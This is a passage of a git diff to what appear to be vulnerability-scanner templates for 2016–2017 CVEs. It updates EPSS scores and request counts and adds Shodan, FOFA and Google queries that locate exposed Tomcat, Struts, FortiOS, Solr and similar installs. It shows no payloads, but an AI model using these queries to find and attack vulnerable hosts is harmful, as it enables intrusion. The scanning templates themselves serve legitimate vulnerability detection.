cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 9390314db9..00d9b940b5 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -20,16 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40457 + epss-score: 0.00114 + epss-percentile: 0.44874 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: tidio-gallery_project - product: tidio-gallery + max-request: 2 + vendor: "tidio-gallery_project" + product: "tidio-gallery" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project - flow: http(1) && http(2) http: diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index f79d3fc41b..de3fd21e68 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -23,7 +23,7 @@ info: epss-percentile: 0.4984 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: browserweb product: whizz framework: wordpress diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 9f3ac293c7..1b464facce 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -22,9 +22,9 @@ info: epss-percentile: 0.41915 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpsolr - product: wpsolr-search-engine + product: "wpsolr-search-engine" framework: wordpress tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index e1a3875b5a..f4bab3aec1 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: zabbix product: zabbix - shodan-query: http.favicon.hash:892542951 - fofa-query: icon_hash=892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" google-query: intitle:"zabbix-server" tags: cve2016,cve,zabbix,sqli,vulhub diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index f99d4589fe..86bc158dd4 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: opsview product: opsview - shodan-query: title:"Opsview" + shodan-query: + - title:"Opsview" + - http.title:"opsview" fofa-query: title="opsview" google-query: intitle:"opsview" tags: cve2016,cve,opsview,lfi diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 7c8f173112..64352a6e12 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -6,29 +6,29 @@ info: severity: medium description: | WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. - remediation: | - Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://wpvulndb.com/vulnerabilities/8431 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - https://github.com/0xkucing/CVE-2016-10993 - https://github.com/ARPSyndicate/cvemon + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 + cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* epss-score: 0.00245 epss-percentile: 0.64569 - cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: scoreme_project - product: scoreme framework: wordpress + max-request: 2 + vendor: "scoreme_project" + product: scoreme tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project flow: http(1) && http(2) diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 1010f351b1..b31f923be3 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: sap product: netweaver - shodan-query: http.favicon.hash:-266008933 + shodan-query: + - http.favicon.hash:-266008933 + - cpe:"cpe:2.3:a:sap:netweaver" fofa-query: icon_hash=-266008933 tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 1e8267e001..f90c576be5 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -28,8 +28,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2016,cve,struts,rce,apache diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 37dde34469..d0856229f4 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.98392 + epss-percentile: 0.98478 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: activemq - shodan-query: cpe:"cpe:2.3:a:apache:activemq" + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 087874bbff..9250d5763e 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: fortinet product: fortios - shodan-query: http.html:"/remote/login" "xxxxxxxx" - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2016,cve,redirect,fortinet,fortios,seclists http: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index aba4c78863..b3528e4663 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2016,cve,crlf,apache,xss http: diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index 07d97735ed..e7b7ebde01 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 - epss-score: 0.03345 - epss-percentile: 0.91147 + epss-score: 0.04558 + epss-percentile: 0.92501 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 5b46f4904b..b770c3c4ce 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -19,11 +19,13 @@ info: cpe: cpe:2.3:a:netgear:readynas_surveillance:1.1.1:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: netgear - product: readynas_surveillance - fofa-query: app="NUUO-NVRmini" || app="NUUO-NVR" || title="Network Video Recorder Login" - tags: cve,cve2016,nuuo,rce + product: "readynas_surveillance" + fofa-query: + - "app=\"NUUO-NVRmini\" || app=\"NUUO-NVR\" || title=\"Network Video Recorder Login\"" + - app="nuuo-nvrmini" || app="nuuo-nvr" || title="network video recorder login" + tags: cve,cve2016,nuuo,rce,netgear variables: rand: "{{to_lower(rand_text_alpha(32))}}" diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 38d141f86c..275f758b3a 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -29,9 +29,18 @@ info: max-request: 6 vendor: vbulletin product: vbulletin - shodan-query: title:"Powered By vBulletin" - google-query: intext:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - title:"Powered By vBulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - http.title:"powered by vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve2016,cve,vbulletin,sqli,forum,edb http: diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index bbc45b58dd..b192f976ea 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 - epss-score: 0.97471 - epss-percentile: 0.99962 + epss-score: 0.97464 + epss-percentile: 0.9996 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 96c42c3ebd..95ad415b23 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2016-6601 cwe-id: CWE-22 - epss-score: 0.97503 - epss-percentile: 0.99977 + epss-score: 0.97504 + epss-percentile: 0.99983 cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index b621310690..9ce4a3870a 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00186 - epss-percentile: 0.55032 + epss-percentile: 0.55834 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 647d30f54d..a1eee421b9 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: spip product: spip - shodan-query: http.html:"spip.php?page=backend" + shodan-query: + - http.html:"spip.php?page=backend" + - cpe:"cpe:2.3:a:spip:spip" fofa-query: body="spip.php?page=backend" tags: cve2016,cve,xss,spip diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index fcbaed68bb..dbefaf615d 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index edf26c1b1b..1e333dea18 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -15,13 +15,14 @@ info: - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html - https://www.exploit-db.com/exploits/42313/ - https://nvd.nist.gov/vuln/detail/CVE-2017-11165 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.99027 + epss-percentile: 0.99189 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index d950a4c815..2588d607a8 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: manageengine product: servicedesk - shodan-query: http.title:"ManageEngine" + shodan-query: + - http.title:"ManageEngine" + - http.title:"manageengine" fofa-query: title="manageengine" google-query: intitle:"manageengine" tags: cve,cve2017,manageengine,lfr,unauth,tenable diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index a426bd4003..b0c1e57a3e 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: supervisord product: supervisor - shodan-query: http.title:"Supervisor Status" + shodan-query: + - http.title:"Supervisor Status" + - http.title:"supervisor status" fofa-query: title="supervisor status" google-query: intitle:"supervisor status" tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 27471932c3..51bd90b179 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40119 + epss-percentile: 0.41273 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 5f22928dd1..987a4f9a4d 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: redhat product: jboss_enterprise_application_platform - shodan-query: http.title:"jboss" + shodan-query: + - http.title:"jboss" + - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" fofa-query: title="jboss" google-query: intitle:"jboss" tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 037219d39d..7c9366a374 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: dokuwiki product: dokuwiki - shodan-query: http.title:"DokuWiki" + shodan-query: + - http.title:"DokuWiki" + - http.title:"dokuwiki" + - cpe:"cpe:2.3:a:dokuwiki:dokuwiki" fofa-query: title="dokuwiki" google-query: intitle:"dokuwiki" tags: cve,cve2017,xss,dokuwiki diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 79c0e76f41..9461b0e9ce 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 99dbd027d6..4c02fb4aa7 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -21,15 +21,21 @@ info: cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 - epss-score: 0.96878 - epss-percentile: 0.99684 + epss-score: 0.96728 + epss-percentile: 0.99659 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index fc1bc7621a..9d08904c44 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -29,8 +29,14 @@ info: max-request: 2 vendor: apache product: tomcat - shodan-query: html:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - html:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2017,cve,tomcat,apache,rce,kev,intrusive diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index f1a7dc0fed..97cf4803fb 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -20,16 +20,23 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97417 - epss-percentile: 0.99925 + epss-score: 0.97427 + epss-percentile: 0.99938 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve2017,cve,oast,xxe,vulhub,solr,apache http: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 731c1e9791..7788c9c77b 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 - epss-score: 0.97348 - epss-percentile: 0.99889 + epss-score: 0.97392 + epss-percentile: 0.99913 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: couchdb - shodan-query: product:"couchdb" + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: cve2017,cve,couchdb,apache,intrusive http: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 52bed4ee3f..eb64fdd13d 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 - epss-score: 0.00648 - epss-percentile: 0.78875 + epss-score: 0.00715 + epss-percentile: 0.80483 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 7034429878..e205a729d3 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: dreambox product: opendreambox - shodan-query: title:"Dreambox WebControl" + shodan-query: + - title:"Dreambox WebControl" + - http.title:"dreambox webcontrol" fofa-query: title="dreambox webcontrol" google-query: intitle:"dreambox webcontrol" tags: cve,cve2017,dreambox,rce,oast,edb diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index f49b0dfc9b..26489ef040 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -29,8 +29,14 @@ info: max-request: 1 vendor: fortinet product: fortios - shodan-query: port:10443 http.favicon.hash:945408572 - fofa-query: body="/remote/login" "xxxxxxxx" + shodan-query: + - port:10443 http.favicon.hash:945408572 + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - http.html:"/remote/login" "xxxxxxxx" + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2017,cve,fortigate,xss,fortinet http: diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 9004855cb0..67088b4e00 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46737 + epss-percentile: 0.47671 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index d40588030d..084264db98 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive http: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 6353771b11..c9f0772cd0 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2017-15944 epss-score: 0.97314 - epss-percentile: 0.99866 + epss-percentile: 0.99875 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: paloaltonetworks product: pan-os + shodan-query: + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" fofa-query: icon_hash="-631559155" - shodan-query: http.favicon.hash:"-631559155" tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks http: diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 18eff63188..91606616f1 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -14,19 +14,22 @@ info: - https://github.com/zeit/next.js/releases/tag/2.4.1 - https://nvd.nist.gov/vuln/detail/CVE-2017-16877 - https://github.com/vercel/next.js/commit/02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.00337 - epss-percentile: 0.68302 + epss-percentile: 0.71295 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js - shodan-query: http.html:"/_next/static" + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" tags: cve,cve2017,nextjs,lfi,traversal,zeit diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 27c7657e3b..91313577bd 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -29,8 +29,13 @@ info: max-request: 1 vendor: laravel product: laravel - shodan-query: Laravel-Framework - fofa-query: app="Laravel-Framework" + shodan-query: + - Laravel-Framework + - cpe:"cpe:2.3:a:laravel:laravel" + - laravel-framework + fofa-query: + - app="Laravel-Framework" + - app="laravel-framework" tags: cve,cve2017,laravel,exposure,packetstorm http: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 1bad04ee13..23ca6dfd9c 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.64551 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: zitec - product: emag_marketplace_connector + product: "emag_marketplace_connector" framework: wordpress tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec flow: http(1) && http(2) diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 81239b67f7..bc5d62670a 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -23,8 +23,8 @@ info: epss-percentile: 0.642 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: amtythumb_project + max-request: 2 + vendor: "amtythumb_project" product: amtythumb framework: wordpress tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index e4bd532644..03697cf997 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -24,9 +24,9 @@ info: epss-percentile: 0.54962 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: wpmailster - product: wp_mailster + product: "wp_mailster" framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster flow: http(1) && http(2) diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index cd12b0eaf6..5cca4358dc 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -21,15 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17731 cwe-id: CWE-89 - epss-score: 0.02129 - epss-percentile: 0.88972 + epss-score: 0.04196 + epss-percentile: 0.92213 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dedecms product: dedecms - shodan-query: http.html:"DedeCms" - fofa-query: app="DedeCMS" + shodan-query: + - http.html:"DedeCms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + - http.html:"dedecms" + fofa-query: + - app="DedeCMS" + - app="dedecms" + - body="dedecms" tags: cve,cve2017,sqli,dedecms variables: num: "999999999" diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 7ee2be835e..4251897c62 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -29,9 +29,11 @@ info: max-request: 1 vendor: kentico product: kentico_cms - google-query: intitle:"kentico database setup" - shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + shodan-query: + - cpe:"cpe:2.3:a:kentico:kentico_cms" + - http.title:"kentico database setup" fofa-query: title="kentico database setup" + google-query: intitle:"kentico database setup" tags: cve2017,cve,kentico,cms,install,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index c57bb085a4..6d8fd59f23 100644 --- 